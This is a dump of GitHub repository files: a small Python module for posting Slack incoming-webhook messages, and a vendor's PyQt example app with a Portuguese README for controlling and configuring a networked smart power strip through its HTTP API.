"text": "# coding:utf-8\n'''This program is class for incoming webhooks'''\n\nimport requests\nimport json\n\n\nclass IncomingWebhooks:\n \"\"\"Incoming webhooks\"\"\"\n\n def __init__(self, url='', text=u'', username=u'', icon_emoji=u'', link_names=0):\n \"\"\"Set Property\"\"\"\n self.url = url\n self.data = json.dumps({\n 'text': text, # text\n 'username': username, # user name\n 'icon_emoji': icon_emoji, # profile emoji\n 'link_names': link_names, # mention\n })\n\n def send(self):\n \"\"\"Send to Slack\"\"\"\n requests.post(\n self.url,\n self.data\n )\n"
},
{
"alpha_fraction": 0.7041965126991272,
"alphanum_fraction": 0.708290696144104,
"avg_line_length": 20.2391300201416,
"blob_id": "6ba086d68fd84dfc289751a3bfdf155530099bac",
"content_id": "b833073f17133cb04d6e297ec808c373de42b68f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 977,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 46,
"path": "/README.md",
"repo_name": "akakou/Incoming-WebHooks-Bot",
"src_encoding": "UTF-8",
"text": "# Incoming-WebHooks-Bot\n## What is it\nPython Modeule for Incoming WebHooks Bot. \nYou can send to slack with Incoming WebHooks ! \n\n## How to install\n### First\nThis modeule can set to move your program's directry.\n\n### requests Modeule\nYou must install `requests` module to use this modeule.\nInstall `pip` and run this command.\n```shell\npip install requests\n```\n\n## How to use\n### Source\n```python\nbot = incoming_webhooks.IncomingWebhooks(url, text, username, icon_emoji, link_names)\nbot.send()\n```\n### Meaning of each variable\n* url : incoming webhooks URL \n* text : message you want to send\n* username : bot name\n* icon_emoji : bot icon\n* link_names : if you want mention, input 1.\n\n\n## Example\n```python\n# coding:utf-8\nimport incoming_webhooks\n\n# Property\nurl = \"https://hooks.slack.com/services/\"\ntext = \"hello\"\nusername = \"bot\"\nicon_emoji = \":+1:\"\nlink_names = 1\n\n# Run\nbot = incoming_webhooks.IncomingWebhooks(url, text, username, icon_emoji, link_names)\nbot.send()\n```\n"
}
] | 2 |
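The `send` method in `incoming_webhooks.py` above posts the JSON string as the raw request body, which Slack's Incoming WebHooks endpoint accepts. A slightly hardened variant (an illustrative sketch, not part of the repo) that sets the content type explicitly, adds a timeout, and surfaces HTTP errors:

```python
import json
import requests

def send_webhook(url, text, username='bot', icon_emoji=':+1:', link_names=0):
    """Post a message to a Slack Incoming WebHook and raise on failure."""
    payload = {'text': text, 'username': username,
               'icon_emoji': icon_emoji, 'link_names': link_names}
    resp = requests.post(url,
                         data=json.dumps(payload),
                         headers={'Content-Type': 'application/json'},
                         timeout=5)
    resp.raise_for_status()  # raise on non-2xx so callers notice failures
    return resp

# send_webhook('https://hooks.slack.com/services/...', 'hello')  # URL elided
```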
volt-tecnologia/API_PYTHON_Example
|
https://github.com/volt-tecnologia/API_PYTHON_Example
|
96bb3f9aa679ccac09036787e1f70c19f8eba305
|
b42a08bcf9ac3a946e01a9e051baec26b5f41219
|
69109d4d899aa4981fc6bf17e870ad91afbedc98
|
refs/heads/master
| 2020-10-01T19:30:55.586281 | 2020-01-23T13:26:59 | 2020-01-23T13:26:59 | 227,608,711 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5739480257034302,
"alphanum_fraction": 0.5887994766235352,
"avg_line_length": 39.89873504638672,
"blob_id": "e698ab499fb24a1fa95d1a637d3f85f56191e17f",
"content_id": "89ec5f99cf3c51661831424c20f53bcf0483acdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3239,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 79,
"path": "/main.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "#from PyQt5 import QtGui\n#from PyQt5.QtCore import QRect\nfrom PyQt5.QtWidgets import QApplication,QPushButton, QMainWindow\nfrom main_ui import *\nfrom voltdevice import VoltDevice\nimport sys\nclass Window(QMainWindow):\n def __init__(self, parent=None):\n self.colorVerde = 'rgb(0,255,102)'\n QtWidgets.QTabWidget.__init__(self, parent)\n\n self.ui = WindowUI()\n self.ui.setupUi(self)\n\n #self.vd = VoltDevice('admin','voltvolt','192.168.0.90')\n #if self.vd.lastInfo !=0:\n # self.ui.updateUI(self.vd)\n \n def login(self):\n if(self.ui.btConnect.text() == \"Conectar\"):\n \n self.vd = VoltDevice(self.ui.userField.text(), self.ui.passField.text(), self.ui.ipField.text())\n resp = self.vd.updateInfo()\n if resp == 200 :\n print('Login sucesso!!')\n self.ui.alert(self, 'Sucesso','Login efetuado com sucesso!!')\n self.ui.btConnect.setText(\"Desconectar\")\n self.ui.updateUI(self.vd)\n elif resp == 401: \n print('Falha login')\n self.ui.alert(self, 'Falha','Falha de autenticação!!')\n\n elif resp == 500: \n print('Falha login')\n self.ui.alert(self, 'Falha','Equipamento inacessível!!')\n else:\n self.ui.btConnect.setText(\"Conectar\")\n self.ui.enableComponents(False)\n\n def controlTomada(self, tomada):\n if(self.vd.lastInfo !=0 ):\n resp = self.vd.ctrlAc(tomada,0)\n if resp.status_code == 200:\n print(\"comando enviado com sucesso\")\n else:\n self.ui.alert(self,\"Erro \"+str(resp.status_code),resp.content.decode())\n\n self.ui.updateUI(self.vd)\n\n def saveEthernet(self):\n if(self.vd.lastInfo !=0):\n resp = self.vd.configEthernet(self.ui.dhcp.isChecked(), self.ui.hostname.text(), self.ui.ip.text(),self.ui.gateway.text(),self.ui.mask.text(),self.ui.dns1.text(), self.ui.dns2.text()) \n if(resp.status_code == 200):\n self.ui.alert(self, 'Sucesso','Configuração executada com sucesso!!')\n else: self.ui.alert(self, 'Falha','Falha!!')\n\n def selectTomada(self):\n if(self.ui.cbTomada.currentIndex() > 0 and self.vd.lastInfo !=0):\n nome = self.vd.getNomeAC(int(self.ui.cbTomada.currentText()))\n self.ui.nomeTomadaField.setText(nome)\n self.ui.cbHabilitaTomada.setChecked(self.vd.getRmac(int(self.ui.cbTomada.currentText())))\n\n def configTomada(self):\n if(self.ui.cbTomada.currentIndex() > 0 and self.vd.lastInfo !=0): \n resp = self.vd.ctrlAc(self.ui.cbTomada.currentIndex(), 1,self.ui.cbHabilitaTomada.isChecked() , self.ui.nomeTomadaField.text())\n print(resp.status_code)\n if(hasattr(resp, 'status_code') and resp.status_code == 200):\n self.ui.alert(self, 'Sucesso','Configuração executada com sucesso!!')\n else: self.ui.alert(self, 'Falha','Falha!!')\n self.ui.updateUI(self.vd)\n\n def alert(self, msg):\n print(msg)\n\nApp = QApplication(sys.argv)\nwindow = Window()\n\nwindow.show()\nsys.exit(App.exec())\n\n"
},
{
"alpha_fraction": 0.612516462802887,
"alphanum_fraction": 0.6661503911018372,
"avg_line_length": 52.9752311706543,
"blob_id": "7d8b3354cab8b3515c541e972dc11e8a6b2cf3f4",
"content_id": "8c6aae1f5e22803c84cc511f85bd580f64e1192a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17440,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 323,
"path": "/main_ui.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\dialog.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\n\n\nclass WindowUI(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(1176, 390)\n self.showTomada1 = QtWidgets.QPushButton(Dialog)\n self.showTomada1.setGeometry(QtCore.QRect(40, 280, 101, 51))\n self.showTomada1.setObjectName(\"showTomada1\")\n self.showTomada2 = QtWidgets.QPushButton(Dialog)\n self.showTomada2.setGeometry(QtCore.QRect(150, 280, 101, 51))\n self.showTomada2.setObjectName(\"showTomada2\")\n self.showTomada4 = QtWidgets.QPushButton(Dialog)\n self.showTomada4.setGeometry(QtCore.QRect(370, 280, 101, 51))\n self.showTomada4.setObjectName(\"showTomada4\")\n self.showTomada3 = QtWidgets.QPushButton(Dialog)\n self.showTomada3.setGeometry(QtCore.QRect(260, 280, 101, 51))\n self.showTomada3.setObjectName(\"showTomada3\")\n self.showTomada8 = QtWidgets.QPushButton(Dialog)\n self.showTomada8.setGeometry(QtCore.QRect(810, 280, 101, 51))\n self.showTomada8.setObjectName(\"showTomada8\")\n self.showTomada6 = QtWidgets.QPushButton(Dialog)\n self.showTomada6.setGeometry(QtCore.QRect(590, 280, 101, 51))\n self.showTomada6.setObjectName(\"showTomada6\")\n self.showTomada7 = QtWidgets.QPushButton(Dialog)\n self.showTomada7.setGeometry(QtCore.QRect(700, 280, 101, 51))\n self.showTomada7.setObjectName(\"showTomada7\")\n self.showTomada5 = QtWidgets.QPushButton(Dialog)\n self.showTomada5.setGeometry(QtCore.QRect(480, 280, 101, 51))\n self.showTomada5.setObjectName(\"showTomada5\")\n self.showTomada10 = QtWidgets.QPushButton(Dialog)\n self.showTomada10.setGeometry(QtCore.QRect(1030, 280, 101, 51))\n self.showTomada10.setObjectName(\"showTomada10\")\n self.showTomada9 = QtWidgets.QPushButton(Dialog)\n self.showTomada9.setGeometry(QtCore.QRect(920, 280, 101, 51))\n self.showTomada9.setObjectName(\"showTomada9\")\n self.groupBox = QtWidgets.QGroupBox(Dialog)\n self.groupBox.setGeometry(QtCore.QRect(840, 20, 261, 241))\n self.groupBox.setObjectName(\"groupBox\")\n self.dhcp = QtWidgets.QCheckBox(self.groupBox)\n self.dhcp.setGeometry(QtCore.QRect(16, 20, 70, 17))\n self.dhcp.setObjectName(\"dhcp\")\n self.btSaveEthernet = QtWidgets.QPushButton(self.groupBox)\n self.btSaveEthernet.setGeometry(QtCore.QRect(10, 210, 241, 23))\n self.btSaveEthernet.setObjectName(\"btSaveEthernet\")\n self.label_9 = QtWidgets.QLabel(self.groupBox)\n self.label_9.setGeometry(QtCore.QRect(6, 50, 61, 16))\n self.label_9.setObjectName(\"label_9\")\n self.label_10 = QtWidgets.QLabel(self.groupBox)\n self.label_10.setGeometry(QtCore.QRect(6, 100, 47, 13))\n self.label_10.setObjectName(\"label_10\")\n self.label_11 = QtWidgets.QLabel(self.groupBox)\n self.label_11.setGeometry(QtCore.QRect(6, 150, 101, 16))\n self.label_11.setObjectName(\"label_11\")\n self.label_12 = QtWidgets.QLabel(self.groupBox)\n self.label_12.setGeometry(QtCore.QRect(140, 50, 47, 13))\n self.label_12.setObjectName(\"label_12\")\n self.label_13 = QtWidgets.QLabel(self.groupBox)\n self.label_13.setGeometry(QtCore.QRect(140, 100, 91, 16))\n self.label_13.setObjectName(\"label_13\")\n self.label_14 = QtWidgets.QLabel(self.groupBox)\n self.label_14.setGeometry(QtCore.QRect(140, 150, 101, 16))\n self.label_14.setObjectName(\"label_14\")\n self.hostname = QtWidgets.QLineEdit(self.groupBox)\n 
self.hostname.setGeometry(QtCore.QRect(6, 70, 113, 20))\n self.hostname.setObjectName(\"hostname\")\n self.gateway = QtWidgets.QLineEdit(self.groupBox)\n self.gateway.setGeometry(QtCore.QRect(140, 70, 113, 20))\n self.gateway.setObjectName(\"gateway\")\n self.ip = QtWidgets.QLineEdit(self.groupBox)\n self.ip.setGeometry(QtCore.QRect(6, 120, 113, 20))\n self.ip.setObjectName(\"ip\")\n self.dns1 = QtWidgets.QLineEdit(self.groupBox)\n self.dns1.setGeometry(QtCore.QRect(140, 120, 113, 20))\n self.dns1.setObjectName(\"dns1\")\n self.mask = QtWidgets.QLineEdit(self.groupBox)\n self.mask.setGeometry(QtCore.QRect(6, 170, 113, 20))\n self.mask.setObjectName(\"mask\")\n self.dns2 = QtWidgets.QLineEdit(self.groupBox)\n self.dns2.setGeometry(QtCore.QRect(140, 170, 113, 20))\n self.dns2.setObjectName(\"dns2\")\n self.ipField = QtWidgets.QLineEdit(Dialog)\n self.ipField.setGeometry(QtCore.QRect(70, 20, 113, 20))\n self.ipField.setObjectName(\"ipField\")\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(20, 20, 21, 16))\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(Dialog)\n self.label_2.setGeometry(QtCore.QRect(20, 50, 47, 13))\n self.label_2.setObjectName(\"label_2\")\n self.userField = QtWidgets.QLineEdit(Dialog)\n self.userField.setGeometry(QtCore.QRect(70, 50, 113, 20))\n self.userField.setObjectName(\"userField\")\n self.label_3 = QtWidgets.QLabel(Dialog)\n self.label_3.setGeometry(QtCore.QRect(190, 50, 47, 13))\n self.label_3.setObjectName(\"label_3\")\n self.passField = QtWidgets.QLineEdit(Dialog)\n self.passField.setGeometry(QtCore.QRect(230, 50, 113, 20))\n self.passField.setObjectName(\"passField\")\n self.label_4 = QtWidgets.QLabel(Dialog)\n self.label_4.setGeometry(QtCore.QRect(20, 130, 47, 13))\n self.label_4.setObjectName(\"label_4\")\n self.label_5 = QtWidgets.QLabel(Dialog)\n self.label_5.setGeometry(QtCore.QRect(20, 160, 71, 16))\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(Dialog)\n self.label_6.setGeometry(QtCore.QRect(20, 190, 71, 16))\n self.label_6.setObjectName(\"label_6\")\n self.groupBox_2 = QtWidgets.QGroupBox(Dialog)\n self.groupBox_2.setGeometry(QtCore.QRect(610, 110, 191, 151))#self.groupBox_2.setGeometry(QtCore.QRect(610, 140, 181, 121))\n self.groupBox_2.setObjectName(\"groupBox_2\")\n self.label_7 = QtWidgets.QLabel(self.groupBox_2)\n self.label_7.setGeometry(QtCore.QRect(10, 20, 47, 13))\n self.label_7.setObjectName(\"label_7\")\n self.nomeTomadaField = QtWidgets.QLineEdit(self.groupBox_2)\n self.nomeTomadaField.setGeometry(QtCore.QRect(60, 50, 113, 20))\n self.nomeTomadaField.setObjectName(\"nomeTomadaField\")\n self.label_8 = QtWidgets.QLabel(self.groupBox_2)\n self.label_8.setGeometry(QtCore.QRect(10, 50, 47, 13))\n self.label_8.setObjectName(\"label_8\")\n self.btRenamePort = QtWidgets.QPushButton(self.groupBox_2)\n self.btRenamePort.setGeometry(QtCore.QRect(10, 120, 171, 23))#self.btRenamePort.setGeometry(QtCore.QRect(4, 80, 171, 23))\n self.btRenamePort.setObjectName(\"btRenamePort\")\n self.cbTomada = QtWidgets.QComboBox(self.groupBox_2)\n self.cbTomada.setGeometry(QtCore.QRect(60, 20, 69, 22))\n self.cbTomada.setObjectName(\"cbTomada\")\n\n self.cbHabilitaTomada = QtWidgets.QCheckBox(self.groupBox_2)\n self.cbHabilitaTomada.setGeometry(QtCore.QRect(10, 80, 70, 17))\n self.cbHabilitaTomada.setObjectName(\"cbHabilitaTomada\")\n\n self.btConnect = QtWidgets.QPushButton(Dialog)\n self.btConnect.setGeometry(QtCore.QRect(380, 50, 75, 23))\n self.btConnect.setObjectName(\"btConnect\")\n 
self.uptimeField = QtWidgets.QLineEdit(Dialog)\n self.uptimeField.setGeometry(QtCore.QRect(100, 130, 113, 20))\n self.uptimeField.setObjectName(\"uptimeField\")\n self.tempField = QtWidgets.QLineEdit(Dialog)\n self.tempField.setGeometry(QtCore.QRect(100, 160, 113, 20))\n self.tempField.setObjectName(\"tempField\")\n self.dataHoraField = QtWidgets.QLineEdit(Dialog)\n self.dataHoraField.setGeometry(QtCore.QRect(100, 190, 113, 20))\n self.dataHoraField.setObjectName(\"dataHoraField\")\n\n self.nt1 = QtWidgets.QLineEdit(Dialog)\n self.nt1.setGeometry(QtCore.QRect(40, 340, 101, 20))\n self.nt1.setReadOnly(True)\n self.nt1.setObjectName(\"nt1\")\n self.nt2 = QtWidgets.QLineEdit(Dialog)\n self.nt2.setGeometry(QtCore.QRect(150, 340, 101, 20))\n self.nt2.setReadOnly(True)\n self.nt2.setObjectName(\"nt2\")\n self.nt3 = QtWidgets.QLineEdit(Dialog)\n self.nt3.setGeometry(QtCore.QRect(260, 340, 101, 20))\n self.nt3.setReadOnly(True)\n self.nt3.setObjectName(\"nt3\")\n self.nt4 = QtWidgets.QLineEdit(Dialog)\n self.nt4.setGeometry(QtCore.QRect(370, 340, 101, 20))\n self.nt4.setReadOnly(True)\n self.nt4.setObjectName(\"nt4\")\n self.nt5 = QtWidgets.QLineEdit(Dialog)\n self.nt5.setGeometry(QtCore.QRect(480, 340, 101, 20))\n self.nt5.setReadOnly(True)\n self.nt5.setObjectName(\"nt5\")\n self.nt6 = QtWidgets.QLineEdit(Dialog)\n self.nt6.setGeometry(QtCore.QRect(590, 340, 101, 20))\n self.nt6.setReadOnly(True)\n self.nt6.setObjectName(\"nt6\")\n self.nt7 = QtWidgets.QLineEdit(Dialog)\n self.nt7.setGeometry(QtCore.QRect(700, 340, 101, 20))\n self.nt7.setReadOnly(True)\n self.nt7.setObjectName(\"nt7\")\n self.nt8 = QtWidgets.QLineEdit(Dialog)\n self.nt8.setGeometry(QtCore.QRect(810, 340, 101, 20))\n self.nt8.setReadOnly(True)\n self.nt8.setObjectName(\"nt8\")\n self.nt9 = QtWidgets.QLineEdit(Dialog)\n self.nt9.setGeometry(QtCore.QRect(920, 340, 101, 20))\n self.nt9.setReadOnly(True)\n self.nt9.setObjectName(\"nt9\")\n self.nt10 = QtWidgets.QLineEdit(Dialog)\n self.nt10.setGeometry(QtCore.QRect(1030, 340, 101, 20))\n self.nt10.setReadOnly(True)\n self.nt10.setObjectName(\"nt10\")\n\n self.retranslateUi(Dialog)\n self.initHandlers(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.showTomada1.setText(_translate(\"Dialog\", \"TOMADA1\"))\n self.showTomada2.setText(_translate(\"Dialog\", \"TOMADA2\"))\n self.showTomada4.setText(_translate(\"Dialog\", \"TOMADA4\"))\n self.showTomada3.setText(_translate(\"Dialog\", \"TOMADA3\"))\n self.showTomada8.setText(_translate(\"Dialog\", \"TOMADA8\"))\n self.showTomada6.setText(_translate(\"Dialog\", \"TOMADA6\"))\n self.showTomada7.setText(_translate(\"Dialog\", \"TOMADA7\"))\n self.showTomada5.setText(_translate(\"Dialog\", \"TOMADA5\"))\n self.showTomada10.setText(_translate(\"Dialog\", \"TOMADA10\"))\n self.showTomada9.setText(_translate(\"Dialog\", \"TOMADA9\"))\n self.groupBox.setTitle(_translate(\"Dialog\", \"Configuração de Rede\"))\n self.dhcp.setText(_translate(\"Dialog\", \"DHCP\"))\n self.btSaveEthernet.setText(_translate(\"Dialog\", \"Salvar\"))\n self.label_9.setText(_translate(\"Dialog\", \"Hostname\"))\n self.label_10.setText(_translate(\"Dialog\", \"IP\"))\n self.label_11.setText(_translate(\"Dialog\", \"Máscara de rede\"))\n self.label_12.setText(_translate(\"Dialog\", \"Gateway\"))\n self.label_13.setText(_translate(\"Dialog\", \"DNS Primário\"))\n self.label_14.setText(_translate(\"Dialog\", \"DNS 
Secundário\"))\n self.label.setText(_translate(\"Dialog\", \"IP:\"))\n self.label_2.setText(_translate(\"Dialog\", \"Usuário:\"))\n self.label_3.setText(_translate(\"Dialog\", \"Senha:\"))\n self.label_4.setText(_translate(\"Dialog\", \"Uptime:\"))\n self.label_5.setText(_translate(\"Dialog\", \"Temperatura:\"))\n self.label_6.setText(_translate(\"Dialog\", \"Data e Hora:\"))\n self.groupBox_2.setTitle(_translate(\"Dialog\", \"Configurar Tomada\"))#self.groupBox_2.setTitle(_translate(\"Dialog\", \"Renomear porta\"))\n self.label_7.setText(_translate(\"Dialog\", \"Porta\"))\n self.label_8.setText(_translate(\"Dialog\", \"Nome\"))\n self.btRenamePort.setText(_translate(\"Dialog\", \"Salvar\"))\n self.cbHabilitaTomada.setText(_translate(\"Dialog\", \"Habilitada\"))\n self.btConnect.setText(_translate(\"Dialog\", \"Conectar\"))\n self.cbTomada.addItems(['','1','2','3','4','5','6','7','8','9','10'])\n\n self.ipField.setText('192.168.0.91')\n self.userField.setText('admin')\n self.passField.setText('voltvolt')\n\n def initHandlers(self, Dialog):\n self.btConnect.clicked.connect(Dialog.login);\n self.showTomada1.clicked.connect(lambda: Dialog.controlTomada(1))\n self.showTomada2.clicked.connect(lambda: Dialog.controlTomada(2))\n self.showTomada3.clicked.connect(lambda: Dialog.controlTomada(3))\n self.showTomada4.clicked.connect(lambda: Dialog.controlTomada(4))\n self.showTomada5.clicked.connect(lambda: Dialog.controlTomada(5))\n self.showTomada6.clicked.connect(lambda: Dialog.controlTomada(6))\n self.showTomada7.clicked.connect(lambda: Dialog.controlTomada(7))\n self.showTomada8.clicked.connect(lambda: Dialog.controlTomada(8))\n self.showTomada9.clicked.connect(lambda: Dialog.controlTomada(9))\n self.showTomada10.clicked.connect(lambda: Dialog.controlTomada(10))\n self.cbTomada.currentIndexChanged.connect(Dialog.selectTomada)\n self.btRenamePort.clicked.connect(Dialog.configTomada)\n self.btSaveEthernet.clicked.connect(Dialog.saveEthernet)\n \n def enableComponents(self, enable):\n self.uptimeField.setEnabled(enable)\n self.tempField.setEnabled(enable)\n self.dataHoraField.setEnabled(enable)\n self.showTomada1.setEnabled(enable)\n\n self.showTomada2.setEnabled(enable)\n self.showTomada3.setEnabled(enable)\n self.showTomada4.setEnabled(enable)\n self.showTomada5.setEnabled(enable)\n self.showTomada6.setEnabled(enable)\n self.showTomada7.setEnabled(enable)\n self.showTomada8.setEnabled(enable)\n self.showTomada9.setEnabled(enable)\n self.showTomada10.setEnabled(enable)\n self.hostname.setEnabled(enable)\n self.ip.setEnabled(enable)\n self.gateway.setEnabled(enable)\n self.mask.setEnabled(enable)\n self.dns1.setEnabled(enable)\n self.dns2.setEnabled(enable)\n self.dhcp.setEnabled(enable)\n\n def updateUI(self, vd):\n colorVerde = 'rgb(0,255,102)'\n print(vd.updateInfo())\n print('Atualiza ui')\n if(vd.lastInfo != 0):\n self.enableComponents(True)\n self.uptimeField.setText(vd.getUptime())\n self.tempField.setText(vd.lastInfo['temp']+' °C')\n self.dataHoraField.setText(vd.getDate()+'-'+vd.getTime())\n self.showTomada1.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(1) else (colorVerde if vd.getAc(1) else \"red\"))+\"\");\n\n self.showTomada2.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(2) else (colorVerde if vd.getAc(2) else \"red\"))+\"\");\n self.showTomada3.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(3) else (colorVerde if vd.getAc(3) else \"red\"))+\"\");\n self.showTomada4.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(4) 
else (colorVerde if vd.getAc(4) else \"red\"))+\"\");\n self.showTomada5.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(5) else (colorVerde if vd.getAc(5) else \"red\"))+\"\");\n self.showTomada6.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(6) else (colorVerde if vd.getAc(6) else \"red\"))+\"\");\n self.showTomada7.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(7) else (colorVerde if vd.getAc(7) else \"red\"))+\"\");\n self.showTomada8.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(8) else (colorVerde if vd.getAc(8) else \"red\"))+\"\");\n self.showTomada9.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(9) else (colorVerde if vd.getAc(9) else \"red\"))+\"\");\n self.showTomada10.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(10) else (colorVerde if vd.getAc(10) else \"red\"))+\"\");\n self.hostname.setText(vd.lastInfo['devhost'])\n self.ip.setText(vd.lastInfo['devip'])\n self.gateway.setText(vd.lastInfo['devgtw'])\n self.mask.setText(vd.lastInfo['devmask'])\n self.dns1.setText(vd.lastInfo['devdns1'])\n self.dns2.setText(vd.lastInfo['devdns2'])\n self.dhcp.setChecked(True if vd.lastInfo['devdhcp'] == 'true' else False)\n\n self.nt1.setText(vd.getNomeAC(1))\n self.nt2.setText(vd.getNomeAC(2))\n self.nt3.setText(vd.getNomeAC(3))\n self.nt4.setText(vd.getNomeAC(4))\n self.nt5.setText(vd.getNomeAC(5))\n self.nt6.setText(vd.getNomeAC(6))\n self.nt7.setText(vd.getNomeAC(7))\n self.nt8.setText(vd.getNomeAC(8))\n self.nt9.setText(vd.getNomeAC(9))\n self.nt10.setText(vd.getNomeAC(10))\n else: self.enableComponents(False)\n \n\n\n def alert(self, window, title, message):\n QMessageBox.about(window, title, message)"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 34,
"blob_id": "2349188c31f73432ba7b76536466b48263257acf",
"content_id": "3387cb7e3c722049d6d3a98da7d9a44be2e999e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 12,
"path": "/teste.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "\nfrom voltdevice import VoltDevice\n\n\n\nvd = VoltDevice('admin','voltvol','192.168.0.90')\n#print(vd.lastInfo)#imprime todas as informações adquiridas do equipamento\n#print(vd.configEthernet(False, 'HOST1', '192.168.0.91', '192.168.0.6', '255.255.255.0', '8.8.8.8', '8.8.4.3'));#config ethernet\n#print(vd.ctrlAc(3,0,''))\n\n#resp = vd.reqGETHTTP('http://'+vd.ip+'/status.json');\n#print(resp.status_code);\n#print(resp.json());"
},
{
"alpha_fraction": 0.6243256330490112,
"alphanum_fraction": 0.6545692086219788,
"avg_line_length": 40.33783721923828,
"blob_id": "75c0cb80fd12eb9cc2fe189664a94d11d673a274",
"content_id": "6f891f8191f94e1d1bb40797695d9d9d2c552be9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6215,
"license_type": "no_license",
"max_line_length": 234,
"num_lines": 148,
"path": "/README.md",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "# Exemplo API Java para Filtro de Linha Smart Web\n\n## 1. Importe as classe necessária\n from voltdevice import VoltDevice\n\n## 2. Instancie um objeto de FiltroSmartWeb\n\n \"\"\"\n O objeto deve ser instanciado passando 3 argumentos:\n -username: String = nome de usuário para autenticação\n -password: String = senha de usuário para autenticação\n -ip: Endereço IP do equipamento\n \"\"\"\n self.vd = VoltDevice('admin','voltvolt','192.168.0.90')\n \n \n## 3. Funções\n\n### 3.1. Atualizar informações salvas no objeto equip\n \"\"\" def updateInfo(self)\n\n Este método realiza uma requisição GET ao equipamento pedindo as informações atualizadas e retorna um valor inteiro com o código de resposta HTTP.\n É responsável por atualizar todos os atributos do objeto com as informações recebidas, como estado das tomadas, temperatura e outros parâmetros e configurações do equipamento.\n Retorno: \n -200: Requisição realizada com sucesso e Informações atualizadas no objeto\n -401: Requisição recusada por falha na autenticação\n -500: Equipamento inacessível \n\n \"\"\"\n\n resp = self.vd.updateInfo()\n\n### 3.2. Informações do equipamento\n\n#### 3.2.1 Informação de status da tomada (Ligada/Desligada)\n\n \"\"\"def getAc(self, tomada):\n A função retorna uma Boolean com o status (True = ligada / False: desligada) da tomada (1-10) passada como argumento \n resp = self.vd.getAc(tomada):\n \"\"\"\n #Exemplo:\n stTomada1 = self.vd.getAc(1);\n #print(stTomada1) #True/False\n\n#### 3.2.2 Informação de status da tomada (Habilitada/Desabilitada)\n\n \"\"\"def getRmac(self, tomada):\n A função retorna uma Boolean com o status (True = Habilitada / False: Desabilitada) da tomada (1-10) passada como argumento \n resp = self.vd.getRmac(tomada):\n \"\"\"\n #Exemplo:\n stTomada1 = self.vd.getRmac(1);\n #print(stTomada1) #True/False\n\n#### 3.2.3 Nome da tomada (Ligada/Desligada)\n\n \"\"\"def getNomeAc(self, tomada):\n A função retorna uma String com o status (True = ligada / False: desligada) da tomada (1-10) passada como argumento \n resp = self.vd.getNomeAc(tomada):\n \"\"\"\n #Exemplo:\n NomeTomada1 = self.vd.getNomeAc(1);\n #print(NomeTomada1)\n\n#### 3.2.4 Uptime do equipamento\n\n \"\"\"def getUptime(self):\n A função retorna uma String com o uptime do equipamento\n Exemplo de retorno: '12d10h8m' \n resp = self.vd.getUptime()\n \"\"\"\n #Exemplo:\n uptime = self.vd.getNomeAc(1);\n #print(uptime) \n\n### Preparando restante da biblioteca para manipulação das informações\n\n\n\n## 4. Controle de Tomadas\n \"\"\" def ctrlAc(self, tomada, op, habilita=True, ac_name=\"\")\n\n Ao método controlTomda, devem ser passados os argumentos: \n -tomada: number:(0-10) tomada que receberá o comando\n -op:Comando a ser enviado à tomada (0:liga/desliga ; 1:habilita/desabilita e configura nome da porta)\n -habilita: opcional Boolean para infomar a configuração a ser realizada na tomada( True: Habilitar / False: Desabilitar)\n -ac_name: opcional string com um nome para a porta, obrigatório para op 1(mudar nome da porta). Caso op seja 0 , não é necessário esse argumento para o método\n\n Este método retorna um objeto requests.Response com o código de resposta HTTP da requisição realizada no atributo status_code e a informação de erro em caso de código de resposta diferente de 200, acessível no atributo content\n {\n 200: sucesso\n 401: Falha na autenticacação\n 500: Equipamento não localizado\n }\n \"\"\"\n\n resp = self.vd.ctrlAc(tomada, op, habilita, ac_name); \n \n\n### Exemplos:\n### 4.1. 
